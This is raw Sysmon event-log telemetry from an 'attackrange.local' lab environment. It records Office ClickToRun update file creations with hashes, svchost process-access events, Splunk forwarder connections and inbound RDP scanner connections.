14:55:33.314{A7A01FEF-B626-607E-0D00-00000000BB01}1008728C:\Windows\system32\svchost.exe{A7A01FEF-C0A6-607E-8105-00000000BB01}836C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+ca3e|c:\windows\system32\rpcss.dll+ba7a|c:\windows\system32\rpcss.dll+ce2e|c:\windows\system32\rpcss.dll+a853|c:\windows\system32\rpcss.dll+42251|c:\windows\system32\rpcss.dll+42382|c:\windows\system32\rpcss.dll+426bf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000070179Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:33.314{A7A01FEF-B626-607E-0D00-00000000BB01}1008728C:\Windows\system32\svchost.exe{A7A01FEF-C0A6-607E-8105-00000000BB01}836C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+b954|c:\windows\system32\rpcss.dll+ce2e|c:\windows\system32\rpcss.dll+a853|c:\windows\system32\rpcss.dll+42251|c:\windows\system32\rpcss.dll+42382|c:\windows\system32\rpcss.dll+426bf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000070178Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:33.314{A7A01FEF-B626-607E-0D00-00000000BB01}1008728C:\Windows\system32\svchost.exe{A7A01FEF-C0A6-607E-8105-00000000BB01}836C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+ca3e|c:\windows\system32\rpcss.dll+ba7a|c:\windows\system32\rpcss.dll+ce2e|c:\windows\system32\rpcss.dll+a853|c:\windows\system32\rpcss.dll+42251|c:\windows\system32\rpcss.dll+42382|c:\windows\system32\rpcss.dll+426bf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000070177Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:33.314{A7A01FEF-B626-607E-0D00-00000000BB01}1008728C:\Windows\system32\svchost.exe{A7A01FEF-C0A6-607E-8105-00000000BB01}836C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+b954|c:\windows\system32\rpcss.dll+ce2e|c:\windows\system32\rpcss.dll+a853|c:\windows\system32\rpcss.dll+42251|c:\windows\system32\rpcss.dll+42382|c:\windows\system32\rpcss.dll+426bf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000070176Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:33.314{A7A01FEF-B626-607E-0D00-00000000BB01}1008728C:\Windows\system32\svchost.exe{A7A01FEF-C0A6-607E-8105-00000000BB01}836C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+ca3e|c:\windows\system32\rpcss.dll+ba7a|c:\windows\system32\rpcss.dll+ce2e|c:\windows\system32\rpcss.dll+a853|c:\windows\system32\rpcss.dll+42251|c:\windows\system32\rpcss.dll+42382|c:\windows\system32\rpcss.dll+426bf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000070175Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:33.314{A7A01FEF-B626-607E-0D00-00000000BB01}1008728C:\Windows\system32\svchost.exe{A7A01FEF-C0A6-607E-8105-00000000BB01}836C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+b954|c:\windows\system32\rpcss.dll+ce2e|c:\windows\system32\rpcss.dll+a853|c:\windows\system32\rpcss.dll+42251|c:\windows\system32\rpcss.dll+42382|c:\windows\system32\rpcss.dll+426bf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 23542300x800000000000000070174Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:33.298{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Office16\officeappguardwin32.exeMD5=D24889C4416795949AB3F8719FE3CBAC,SHA256=61A3823D9FDCEBEAB370054F32A1CD33C46B46549AB98C7D6C7965B286A54683,IMPHASH=7E37645160C43127DE2921F5E0AC9B7Ctruetrue 23542300x800000000000000070173Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:33.282{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Office16\ODBCTRAC.DLLMD5=CF25A38D09D7696C0F50DAD495B8EF23,SHA256=F7D6716EDC12D67896E06BF7DB191E92BD89E7B921FE0FFE99123D56A0CB8EB0,IMPHASH=DFEC85953EF7043F0BA5DA43BBB319ABtruetrue 23542300x800000000000000070172Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:33.282{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Office16\ODBC32.DLLMD5=7BEBF56569B5DB0AE156583B54CC6D8B,SHA256=16710A70445C62EEC03247638D2C30838A641C4ECDBF24B507FD05F77EB46829,IMPHASH=DE1DFAF3032B0BD8E71B3EA09BAB0809truetrue 23542300x800000000000000070171Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:33.267{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Office16\OCSCLIENTWIN32.DLLMD5=FFE1AE6E08B938A2C0A8C85DFD5CC223,SHA256=3212E5C80B76AB73965887663BFEE61B8D45192BCFB45FE32E8B1293CE47D8FD,IMPHASH=27FFCB7EC0A870CFA30D7D081C595EE1truetrue 23542300x800000000000000070170Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:33.251{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Office16\OCSAEXT.dllMD5=AF4BF70AE8A73FEBC9CB5D126197050D,SHA256=C2EADFFF95DB8D0583AC5E8E7736A024868FCC753BF2393DAD09357E606119DF,IMPHASH=395C3DE403FF64BDB683635354584F9Ctruetrue 23542300x800000000000000070169Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:33.251{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Office16\ocrec.dllMD5=5B4D80E70ABC22EDB62749B888E98786,SHA256=7EF4048F683C9B6BDE741C08D996218529782825C2292CEB5254AA2F8F485E7E,IMPHASH=4902D26E4BC2C2B02EB4ACF10ECAEC53truetrue 23542300x800000000000000070168Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:33.236{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Office16\OcPubMgr.exeMD5=FE2C6AC2D8802FC66149B46670C7512A,SHA256=EFD3199E290451D9F8C0763EBBA2C6591998E330C2EEE3C152FC9D61A221FE20,IMPHASH=C0F7673ECA4780311A373969532F3350truetrue 23542300x800000000000000070167Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:33.220{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Office16\ocppvwintl.dllMD5=1039A0881493A7932C81935CF1EB0678,SHA256=0766CF737261701A583A03D2FE20219E086DD9F0D1809D7A7C06EA1566BFA989,IMPHASH=430CD8A0E31CBCD64F2DDA38982100AFtruetrue 23542300x800000000000000070166Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:33.204{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Office16\ocpptview.dllMD5=C3005E52CC363F8D5B8F3D118A2F7D90,SHA256=36D42E77FF05327A690B39761796A6AE593B8820E01AC23B18C942462EA3E219,IMPHASH=DE008F0F722BB34BC5A7F9989899E532truetrue 23542300x800000000000000070165Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:33.173{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Office16\Ocomprivate.zipMD5=F131571B9906142BABA2CCB550413089,SHA256=D13811A272D88DC536284F7E247A3CD3A375C8FCD0A0528C35952E966867DB76,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000070164Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:33.173{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Office16\ocogl.dllMD5=A46BD6701E7FF19C19D281A3EE6A8E44,SHA256=162AC33EEC6560B9BEF823FDE19F704FE62E8E6EE4A28A65422C3325E1073D92,IMPHASH=3CA2B74AE5C2204E19B3A8C44FF5F4ADtruetrue 23542300x800000000000000070163Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:33.142{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Office16\OcOffice.dllMD5=A78B8D21254BE3D73453708823FD966D,SHA256=33AD001519FBC068F5EDF62C774C5DF1F0BCDCDD5DBCA75E1918A19657845E29,IMPHASH=3C4E8F207066630C344CBC850A974B2Dtruetrue 23542300x800000000000000070162Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:33.126{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Office16\ocmsptls.dllMD5=AFD437DACE978150232E56D1DAE91B4F,SHA256=61ACAD74A4036DA7136D9B53FAFE17ACEDB38526C4A83BFEF9CBF057DCF12626,IMPHASH=D5844023D54C3E6B9C6A0F291824DCCFtruetrue 23542300x800000000000000070161Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:33.110{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Office16\OCIntlDate.dllMD5=0A45A8F2DF18D0E5EC7AC3409E57DBB2,SHA256=917BDAAE9C2673FA01C86C3F46B78AAC4B646255C32C521BAA44C652D8CE18F0,IMPHASH=B1579AA7C72F039C7D6ED51BDA7A19DEtruetrue 23542300x800000000000000070160Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:33.110{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Office16\ocimport.dllMD5=30F64B67AE7E51CC07C039D231EC8A51,SHA256=70937E3B4D31F15BFBA33383A56B4B86CE7ABF2B15238E50E430A6CFB956FA6E,IMPHASH=3B020AFFD05981A5A3CE5CCBF6B12E39truetrue 23542300x800000000000000070159Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:33.095{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Office16\OCHelper.dllMD5=4185288286B2803CF2FF56D6B2CF940E,SHA256=D0F974A5AF2BEEE44B7E205622ADB0E960AE1B39BF16102992ABDC1A75F2FB8E,IMPHASH=8258234615C16891D59EEE4F20387BDCtruetrue 23542300x800000000000000070158Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:33.095{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Office16\OARTODF.DLLMD5=1CB8A8456AB0945A92D52DF06760E242,SHA256=0A22DED4E581CE2A8AC9248587644E0CBDE81463E3C3873BCDF31905C7A59D48,IMPHASH=007D3AC8650648042942CDEED170EB16truetrue 23542300x800000000000000070157Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:33.064{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Office16\OART.DLLMD5=CBBE7B28DDE77AFCC5B467ABFD478B14,SHA256=B474C658E08B60491A0EF97B60F8870B15459C108DD0C5E90B05FBE190AF2128,IMPHASH=CD428A873D5A6F0054E891AA21E86678truetrue 354300x800000000000000049779Microsoft-Windows-Sysmon/Operationalwin-host-895.attackrange.local-2021-04-20 14:55:31.295{85C0FFC9-B7ED-607E-0F00-00000000BB01}948C:\Windows\System32\svchost.exeNT AUTHORITY\NETWORK SERVICEtcpfalsefalse80.82.77.234scanner.openportstats.com54395-false10.0.1.15win-host-895.attackrange.local3389ms-wbt-server 23542300x800000000000000049778Microsoft-Windows-Sysmon/Operationalwin-host-895.attackrange.local-2021-04-20 14:55:33.007{85C0FFC9-B869-607E-D200-00000000BB01}3944NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=EF7486AE0B14B82BE3FB4C021A73FBF6,SHA256=2B572BBCF7F056A4057D6C5DFAC4F3106536A43B7136C0EA7F7C85D5106DD4AF,IMPHASH=00000000000000000000000000000000falsetrue 354300x800000000000000070266Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:33.212{A7A01FEF-E386-607E-7B0A-00000000BB01}5904C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-339.attackrange.local57504-false10.0.1.12-8000- 354300x800000000000000070265Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:32.898{A7A01FEF-B626-607E-0F00-00000000BB01}1136C:\Windows\System32\svchost.exeNT AUTHORITY\NETWORK SERVICEtcpfalsefalse5.188.206.230-34498-false10.0.1.14win-dc-339.attackrange.local3389ms-wbt-server 354300x800000000000000070264Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:32.793{A7A01FEF-B626-607E-0F00-00000000BB01}1136C:\Windows\System32\svchost.exeNT AUTHORITY\NETWORK SERVICEtcpfalsefalse5.188.206.230-42688-false10.0.1.14win-dc-339.attackrange.local3389ms-wbt-server 354300x800000000000000070263Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:31.950{A7A01FEF-B626-607E-0F00-00000000BB01}1136C:\Windows\System32\svchost.exeNT AUTHORITY\NETWORK SERVICEtcpfalsefalse80.82.77.85scanner.openportstats.com59092-false10.0.1.14win-dc-339.attackrange.local3389ms-wbt-server 23542300x800000000000000070262Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:34.595{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Office16\OUTLMIME.DLLMD5=ACDA00785BC5DA78F13C55B7530964BD,SHA256=2396B0F3A12F6BF7B9B19FA3B6A61E2614D62B962A3B3644E10A9FD87A4AD3F6,IMPHASH=65A20242CCD731E6A7D88A2B1B89F5D2truetrue 23542300x800000000000000070261Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:34.579{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Office16\OUTLLIBR.COMMON.DLLMD5=157465B842CE7F7D74F47F3D60D07DE2,SHA256=03ED96D2B5EE51D5F32CAC69A5C422781DE5DDF4B71DC0D8887C7F84AC0DE958,IMPHASH=00000000000000000000000000000000truetrue 23542300x800000000000000070260Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:34.470{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Office16\OUTLFLTR.DLLMD5=BC129BDDD1D2B3A0FD4F2E0E09EA45E5,SHA256=217E2C6CDB392BC71D04EA9590B38234E8CBF9765F6A22793C00D2FB46A9D8F8,IMPHASH=CA01B631F699B020CE6BFE4928905DCBtruetrue 23542300x800000000000000070259Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:34.470{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Office16\OUTLFLTR.DATMD5=1DA7A808F13EB5BE33E0E869407B31F1,SHA256=8B77847E6C158781838E31961BA1CD4BF876BF24B69FABB129906EC0492792EF,IMPHASH=00000000000000000000000000000000truetrue 23542300x800000000000000070258Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:34.423{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Office16\OUTLCTL.DLLMD5=1DB4C32807E7FDAFCEF1E12333079B68,SHA256=2DFC92B6018617F883DE7F452E0E4AEDF2F1BC0648E053E398F4DD763F812777,IMPHASH=203395D0BF83BD8E54FDBB8C2B1F7EF7truetrue 23542300x800000000000000070257Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:34.423{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Office16\OSFUI.DLLMD5=DC21D8EB32F87EFFCE1BE520224D0588,SHA256=A1352DA464A2A359A7DCE2C30DBEE8856BBCFFB3D628222B1C20F72887F1B44D,IMPHASH=D3546C38238FFEBFE14A965752B53C9Dtruetrue 23542300x800000000000000070256Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:34.407{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Office16\OsfTaskengine.dllMD5=91140F892FA7BDD23CDB9F4D27D9409A,SHA256=79EF9F5B3AC5A1380E45DC3A4F6147851F6AB7D2982DD6544442D25814DD857B,IMPHASH=79C6A05A3A66D4B402D50628FD0A512Atruetrue 23542300x800000000000000070255Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:34.376{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Office16\OSFSHARED.DLLMD5=E14FF304C0C20597000A7F550CBBE302,SHA256=2D021D967EBD991EA595C402BA6BE884D670BC3E6B46B2DE708120EC6818C6BB,IMPHASH=8B4DA7FCCC48DE003C88FAF8963982D4truetrue 23542300x800000000000000070254Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:34.361{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Office16\OSFROAMINGPROXY.DLLMD5=95080624F69CAFA2F9E62567C4B01CE6,SHA256=FA0D583CB0B07E51279067E9D33E99954E79FE5FF5A19804FDB9F2AB9174BC3D,IMPHASH=905325600A0D71B21E72E4E7A2EE2DCFtruetrue 23542300x800000000000000070253Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:34.361{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Office16\OSFPROXY.DLLMD5=84AAC15D4531F367221F90A2F972C49E,SHA256=CE7FAF773AE4129C72C803B7ABBDAB90F8E2C8F143493935BD76E0456E3FF775,IMPHASH=905325600A0D71B21E72E4E7A2EE2DCFtruetrue 23542300x800000000000000070252Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:34.361{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Office16\OSF.DLLMD5=E30979BA1D8C000806CDEF82B65EA828,SHA256=267C73A23A7CBF49E39F61A08E8ACEEFEAB2E9B255F7ABBCBC05943B5FABF1F9,IMPHASH=9DF01459EA223E562997A24CD98A228Dtruetrue 23542300x800000000000000070251Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:34.314{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Office16\ORGCHART.EXEMD5=5F76E015295DE5584BB82D5A211DFC27,SHA256=8EAD9B3BA4D60E61B2EE469662FAD71BFCF91959BACA0894401A235EF388C837,IMPHASH=16BF6ADD1CB800DE6D41A32440D663FBtruetrue 23542300x800000000000000070250Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:34.298{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Office16\ONWordAddin.dllMD5=749E35709B43311F71F4F2AAAD6A1146,SHA256=2A012E3A73E23A78CBA1E8D9B286426D8FB86162CDA7FAA69505BE8A58854203,IMPHASH=7666B83361A94F49673F2F72E83FDDC0truetrue 23542300x800000000000000070249Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:34.298{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Office16\ONRES.DLLMD5=21A405A8880E69BAFA891C5CB7354167,SHA256=AD42046AE4473795FF04734CD244408E820A12E55B78E9F6705FF18F2EBB8537,IMPHASH=00000000000000000000000000000000truetrue 23542300x800000000000000070248Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:34.173{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Office16\ONPPTAddin.dllMD5=C18CD7ECF21949411711D583BA7C929B,SHA256=F714C3CDC6CB2ECD72EF58345D78861CBE51DC6AD8A7CD9438E08AF79E4BB7A8,IMPHASH=85F4F80F1554F5F85A44C6CCB40FEE64truetrue 